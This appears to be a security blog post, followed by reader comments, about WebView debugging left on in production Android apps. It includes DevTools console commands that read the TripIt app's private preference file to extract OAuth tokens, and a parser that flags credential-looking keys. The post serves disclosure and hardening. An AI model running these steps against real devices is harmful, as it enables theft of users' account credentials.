Android Security: Don’t leave WebView debugging enabled in production

WebView debugging is switched on with “WebView.setWebContentsDebuggingEnabled(true)”. Leaving it enabled in a production Android app is a bad idea: anyone who can attach to the device over ADB (USB debugging turned on and the host authorised) gets a Chrome DevTools session inside the app’s own WebView, can use it to read the app’s private files, and any long-lived credentials they copy out keep working long after the phone has been handed back. Make the call only in debug builds, for example gated on “BuildConfig.DEBUG”, or remove it altogether.

Take the TripIt app as an example: it ships with WebView debugging enabled, and through it I can read every file inside the app’s private data directory. By connecting a user’s unlocked phone to my laptop, I can extract the TripIt OAuth token.

First, connect the phone over ADB, open chrome://inspect in desktop Chrome, click “inspect” under the “com.tripit” WebView, and type the following into the DevTools console. The first line navigates the WebView to the app’s own shared preferences file; once that has loaded, the second line dumps the document, which now contains the preferences XML.

window.location="file:///data/data/com.tripit/shared_prefs/com.tripit.xml"
document.getElementsByTagName("html")[0].innerHTML

The output lists every preference entry, including lines such as

<string name="oauthTokenSecret">f731d36cdbf9006f917307…</string>

The token and its secret can be copied to another machine and used to act on the user’s TripIt account until the user revokes them. Note that the file:// navigation relies on the WebView allowing file access, which is the default for apps targeting API 29 and below; with file access off, the debugging session still exposes whatever page the WebView has loaded, together with its cookies and web storage.
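Once the preferences XML is on screen, the next step is to pull the entries out of it systematically rather than reading them by eye. The following is an added example, not code from the original post or from TripIt: a small parser for the Android shared_prefs XML format that runs unchanged in the DevTools console and in Node, plus a helper that flags keys that look like credentials. The SAMPLE_PREFS document and every key and value in it are constructed placeholders, not data taken from any real app.

```javascript
// Constructed sample of an Android shared_prefs file (placeholder values only).
const SAMPLE_PREFS = `<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="oauthToken">placeholder-token</string>
    <string name="oauthTokenSecret">placeholder-secret&amp;more</string>
    <boolean name="loggedIn" value="true" />
    <int name="schemaVersion" value="3" />
    <long name="lastSync" value="1700000000000" />
</map>`;

const ENTITY_MAP = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };

// Android escapes &, <, >, " and ' in preference values as XML entities;
// undo that (plus numeric character references) before using the value.
function decodeXmlEntities(s) {
  return s.replace(/&(amp|lt|gt|quot|apos|#x[0-9a-fA-F]+|#[0-9]+);/g, (_, e) => {
    if (e[0] === "#") {
      const code = e[1] === "x" ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
      return String.fromCodePoint(code);
    }
    return ENTITY_MAP[e];
  });
}

// Parse the text of a shared_prefs XML file into a plain object.
// Handles <string>, <boolean>, <int>, <long> and <float> entries; <set> members
// (unnamed <string> children) are deliberately skipped.
function parseSharedPrefs(xmlText) {
  const prefs = {};
  let m;

  // <string name="k">value</string>, <string name="k"></string> or <string name="k" />
  const stringRe = /<string\s+name="([^"]*)"\s*(?:\/>|>([\s\S]*?)<\/string>)/g;
  while ((m = stringRe.exec(xmlText)) !== null) {
    prefs[decodeXmlEntities(m[1])] = decodeXmlEntities(m[2] ?? "");
  }

  // <boolean|int|long|float name="k" value="v" />  (Android writes name before value)
  const scalarRe = /<(boolean|int|long|float)\s+name="([^"]*)"\s+value="([^"]*)"\s*\/>/g;
  while ((m = scalarRe.exec(xmlText)) !== null) {
    const [, type, name, raw] = m;
    const key = decodeXmlEntities(name);
    if (type === "boolean") prefs[key] = raw === "true";
    else if (type === "float") prefs[key] = parseFloat(raw);
    else if (type === "long") prefs[key] = BigInt(raw); // may exceed 2^53, keep exact
    else prefs[key] = parseInt(raw, 10);
  }
  return prefs;
}

// Keys whose names suggest a credential; the pattern is a heuristic, not a standard.
const SENSITIVE_KEY = /token|secret|password|passwd|session|auth|cookie/i;

function findSensitiveEntries(prefs) {
  return Object.keys(prefs).filter((k) => SENSITIVE_KEY.test(k)).sort();
}

// Stand-alone demo over the constructed sample.
const parsed = parseSharedPrefs(SAMPLE_PREFS);
console.log(parsed);
console.log("credential-looking keys:", findSensitiveEntries(parsed));
```

In the DevTools session, pass the XML text shown after the file:// navigation to parseSharedPrefs and feed the result to findSensitiveEntries; the same two functions work on a shared_prefs file pulled from a debuggable build with adb.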

4 Replies to “Android Security: Don’t leave WebView debugging enabled in production”

  1. Hey, where do I have to put this code?

  2. Updated the blog post with more details “First, connect the phone via ADB, open chrome://inspect in the Chrome browser, click “inspect” below “com.tripit” and enter the following in there.”

  3. What’s the impact if we leave the code there and set the value to 0 (false)?

  4. Yeah, `false` is fine there.
